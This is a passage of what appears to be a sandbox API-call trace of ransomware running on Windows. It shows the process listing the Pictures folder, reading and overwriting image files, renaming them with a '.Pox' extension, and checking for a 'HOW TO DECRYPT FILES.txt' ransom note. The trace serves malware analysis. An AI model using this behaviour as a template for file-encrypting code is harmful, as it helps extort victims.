ftLastWriteTime.dwLowDateTime=0x8e1cede0, ftLastWriteTime.dwHighDateTime=0x1d4d544, nFileSizeHigh=0x0, nFileSizeLow=0x1663e, dwReserved0=0x0, dwReserved1=0x0, cFileName="hyJFOAoAXwsv.jpg", cAlternateFileName="HYJFOA~1.JPG")) returned 1 [0040.186] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b9613e0, ftCreationTime.dwHighDateTime=0x1d4ca2b, ftLastAccessTime.dwLowDateTime=0xa1a1e7b0, ftLastAccessTime.dwHighDateTime=0x1d4ca6f, ftLastWriteTime.dwLowDateTime=0xa1a1e7b0, ftLastWriteTime.dwHighDateTime=0x1d4ca6f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpubQOvc", cAlternateFileName="")) returned 1 [0040.186] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf29abcc0, ftCreationTime.dwHighDateTime=0x1d4c536, ftLastAccessTime.dwLowDateTime=0xd2b1a1c0, ftLastAccessTime.dwHighDateTime=0x1d4c96a, ftLastWriteTime.dwLowDateTime=0xd2b1a1c0, ftLastWriteTime.dwHighDateTime=0x1d4c96a, nFileSizeHigh=0x0, nFileSizeLow=0x9b8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="v_sDMrPVb-DCaU80ds7.png", cAlternateFileName="V_SDMR~1.PNG")) returned 1 [0040.186] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.186] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0040.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0040.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0040.186] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0040.186] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures", lpFilePart=0x0) returned 0x26 [0040.186] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpFilePart=0x0) returned 0x27 [0040.186] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x17fcc320, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x17fcc320, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0040.187] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x17fcc320, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x17fcc320, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.187] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdaa82e10, ftCreationTime.dwHighDateTime=0x1d4cac5, ftLastAccessTime.dwLowDateTime=0x563101c0, ftLastAccessTime.dwHighDateTime=0x1d4c7b4, ftLastWriteTime.dwLowDateTime=0x563101c0, ftLastWriteTime.dwHighDateTime=0x1d4c7b4, nFileSizeHigh=0x0, nFileSizeLow=0xa85, dwReserved0=0x0, dwReserved1=0x0, cFileName="-n5DmWUWZemNfRxNv.gif", cAlternateFileName="-N5DMW~1.GIF")) returned 1 [0040.187] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15de270, ftCreationTime.dwHighDateTime=0x1d4cca8, ftLastAccessTime.dwLowDateTime=0x3377a0e0, ftLastAccessTime.dwHighDateTime=0x1d4cd76, ftLastWriteTime.dwLowDateTime=0x3377a0e0, ftLastWriteTime.dwHighDateTime=0x1d4cd76, nFileSizeHigh=0x0, nFileSizeLow=0x15d2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="2-kRBk0S.jpg", cAlternateFileName="")) returned 1 [0040.187] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99a4a6f0, ftCreationTime.dwHighDateTime=0x1d4cc7d, ftLastAccessTime.dwLowDateTime=0x39bb60, ftLastAccessTime.dwHighDateTime=0x1d4d11c, ftLastWriteTime.dwLowDateTime=0x39bb60, ftLastWriteTime.dwHighDateTime=0x1d4d11c, nFileSizeHigh=0x0, nFileSizeLow=0x19ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="aOKaoV.jpg", cAlternateFileName="")) returned 1 [0040.187] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.187] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa386f20, ftCreationTime.dwHighDateTime=0x1d4cb7d, ftLastAccessTime.dwLowDateTime=0x51e9faa0, ftLastAccessTime.dwHighDateTime=0x1d4d4d8, ftLastWriteTime.dwLowDateTime=0x51e9faa0, ftLastWriteTime.dwHighDateTime=0x1d4d4d8, nFileSizeHigh=0x0, nFileSizeLow=0xcc63, dwReserved0=0x0, dwReserved1=0x0, cFileName="GHzQiL.bmp", cAlternateFileName="")) returned 1 [0040.188] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25b1a090, ftCreationTime.dwHighDateTime=0x1d4d31c, ftLastAccessTime.dwLowDateTime=0x8e1cede0, ftLastAccessTime.dwHighDateTime=0x1d4d544, ftLastWriteTime.dwLowDateTime=0x8e1cede0, ftLastWriteTime.dwHighDateTime=0x1d4d544, nFileSizeHigh=0x0, nFileSizeLow=0x1663e, dwReserved0=0x0, dwReserved1=0x0, cFileName="hyJFOAoAXwsv.jpg", cAlternateFileName="HYJFOA~1.JPG")) returned 1 [0040.188] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b9613e0, ftCreationTime.dwHighDateTime=0x1d4ca2b, ftLastAccessTime.dwLowDateTime=0xa1a1e7b0, ftLastAccessTime.dwHighDateTime=0x1d4ca6f, ftLastWriteTime.dwLowDateTime=0xa1a1e7b0, ftLastWriteTime.dwHighDateTime=0x1d4ca6f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpubQOvc", cAlternateFileName="")) returned 1 [0040.188] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf29abcc0, ftCreationTime.dwHighDateTime=0x1d4c536, ftLastAccessTime.dwLowDateTime=0xd2b1a1c0, ftLastAccessTime.dwHighDateTime=0x1d4c96a, ftLastWriteTime.dwLowDateTime=0xd2b1a1c0, ftLastWriteTime.dwHighDateTime=0x1d4c96a, nFileSizeHigh=0x0, nFileSizeLow=0x9b8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="v_sDMrPVb-DCaU80ds7.png", cAlternateFileName="V_SDMR~1.PNG")) returned 1 [0040.188] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf29abcc0, ftCreationTime.dwHighDateTime=0x1d4c536, ftLastAccessTime.dwLowDateTime=0xd2b1a1c0, ftLastAccessTime.dwHighDateTime=0x1d4c96a, ftLastWriteTime.dwLowDateTime=0xd2b1a1c0, ftLastWriteTime.dwHighDateTime=0x1d4c96a, nFileSizeHigh=0x0, nFileSizeLow=0x9b8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="v_sDMrPVb-DCaU80ds7.png", cAlternateFileName="V_SDMR~1.PNG")) returned 0 [0040.188] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0040.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0040.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0040.188] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2-kRBk0S.jpg", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2-kRBk0S.jpg", lpFilePart=0x0) returned 0x33 [0040.188] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0040.189] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2-kRBk0S.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2-krbk0s.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.189] GetFileType (hFile=0x26c) returned 0x1 [0040.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0040.189] GetFileType (hFile=0x26c) returned 0x1 [0040.189] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x15d2c [0040.189] ReadFile (in: hFile=0x26c, lpBuffer=0x3522fa0, nNumberOfBytesToRead=0x15d2c, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x3522fa0*, lpNumberOfBytesRead=0x3ae570*=0x15d2c, lpOverlapped=0x0) returned 1 [0040.198] CloseHandle (hObject=0x26c) returned 1 [0040.256] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.256] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0040.256] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.256] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0040.256] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2-kRBk0S.jpg", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2-kRBk0S.jpg", lpFilePart=0x0) returned 0x33 [0040.256] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0040.256] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2-kRBk0S.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2-krbk0s.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.258] GetFileType (hFile=0x26c) returned 0x1 [0040.258] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0040.258] GetFileType (hFile=0x26c) returned 0x1 [0040.258] WriteFile (in: hFile=0x26c, lpBuffer=0x35901c8*, nNumberOfBytesToWrite=0x15d30, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x35901c8*, lpNumberOfBytesWritten=0x3ae564*=0x15d30, lpOverlapped=0x0) returned 1 [0040.260] CloseHandle (hObject=0x26c) returned 1 [0040.261] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2-kRBk0S.jpg", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2-kRBk0S.jpg", lpFilePart=0x0) returned 0x33 [0040.261] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2-kRBk0S.jpg.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2-kRBk0S.jpg.Pox", lpFilePart=0x0) returned 0x37 [0040.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0040.262] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2-kRBk0S.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2-krbk0s.jpg"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15de270, ftCreationTime.dwHighDateTime=0x1d4cca8, ftLastAccessTime.dwLowDateTime=0x3377a0e0, ftLastAccessTime.dwHighDateTime=0x1d4cd76, ftLastWriteTime.dwLowDateTime=0x2a2e0cc0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x15d30)) returned 1 [0040.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0040.262] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2-kRBk0S.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2-krbk0s.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2-kRBk0S.jpg.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2-krbk0s.jpg.pox")) returned 1 [0040.262] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aOKaoV.jpg", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aOKaoV.jpg", lpFilePart=0x0) returned 0x31 [0040.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0040.262] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aOKaoV.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aokaov.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.262] GetFileType (hFile=0x26c) returned 0x1 [0040.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0040.263] GetFileType (hFile=0x26c) returned 0x1 [0040.263] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x19ee [0040.263] ReadFile (in: hFile=0x26c, lpBuffer=0x23cdcd8, nNumberOfBytesToRead=0x19ee, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x23cdcd8*, lpNumberOfBytesRead=0x3ae570*=0x19ee, lpOverlapped=0x0) returned 1 [0040.264] CloseHandle (hObject=0x26c) returned 1 [0040.316] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0040.316] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0040.317] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aOKaoV.jpg", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aOKaoV.jpg", lpFilePart=0x0) returned 0x31 [0040.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0040.317] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aOKaoV.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aokaov.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.318] GetFileType (hFile=0x26c) returned 0x1 [0040.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0040.318] GetFileType (hFile=0x26c) returned 0x1 [0040.318] WriteFile (in: hFile=0x26c, lpBuffer=0x2422dd0*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x2422dd0*, lpNumberOfBytesWritten=0x3ae564*=0x19f0, lpOverlapped=0x0) returned 1 [0040.319] CloseHandle (hObject=0x26c) returned 1 [0040.320] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aOKaoV.jpg", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aOKaoV.jpg", lpFilePart=0x0) returned 0x31 [0040.320] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aOKaoV.jpg.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aOKaoV.jpg.Pox", lpFilePart=0x0) returned 0x35 [0040.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0040.320] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aOKaoV.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aokaov.jpg"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99a4a6f0, ftCreationTime.dwHighDateTime=0x1d4cc7d, ftLastAccessTime.dwLowDateTime=0x39bb60, ftLastAccessTime.dwHighDateTime=0x1d4d11c, ftLastWriteTime.dwLowDateTime=0x2a379240, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x19f0)) returned 1 [0040.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0040.320] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aOKaoV.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aokaov.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aOKaoV.jpg.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aokaov.jpg.pox")) returned 1 [0040.320] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GHzQiL.bmp", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GHzQiL.bmp", lpFilePart=0x0) returned 0x31 [0040.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0040.320] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GHzQiL.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ghzqil.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.321] GetFileType (hFile=0x26c) returned 0x1 [0040.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0040.321] GetFileType (hFile=0x26c) returned 0x1 [0040.321] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0xcc63 [0040.321] ReadFile (in: hFile=0x26c, lpBuffer=0x2424cd8, nNumberOfBytesToRead=0xcc63, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x2424cd8*, lpNumberOfBytesRead=0x3ae570*=0xcc63, lpOverlapped=0x0) returned 1 [0040.322] CloseHandle (hObject=0x26c) returned 1 [0040.337] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.337] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0040.337] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.337] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0040.337] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GHzQiL.bmp", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GHzQiL.bmp", lpFilePart=0x0) returned 0x31 [0040.337] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0040.337] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GHzQiL.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ghzqil.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.338] GetFileType (hFile=0x26c) returned 0x1 [0040.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0040.339] GetFileType (hFile=0x26c) returned 0x1 [0040.339] WriteFile (in: hFile=0x26c, lpBuffer=0x2498028*, nNumberOfBytesToWrite=0xcc70, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x2498028*, lpNumberOfBytesWritten=0x3ae564*=0xcc70, lpOverlapped=0x0) returned 1 [0040.340] CloseHandle (hObject=0x26c) returned 1 [0040.341] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GHzQiL.bmp", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GHzQiL.bmp", lpFilePart=0x0) returned 0x31 [0040.341] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GHzQiL.bmp.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GHzQiL.bmp.Pox", lpFilePart=0x0) returned 0x35 [0040.342] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0040.342] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GHzQiL.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ghzqil.bmp"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa386f20, ftCreationTime.dwHighDateTime=0x1d4cb7d, ftLastAccessTime.dwLowDateTime=0x51e9faa0, ftLastAccessTime.dwHighDateTime=0x1d4d4d8, ftLastWriteTime.dwLowDateTime=0x2a39f3a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xcc70)) returned 1 [0040.342] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0040.342] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GHzQiL.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ghzqil.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS 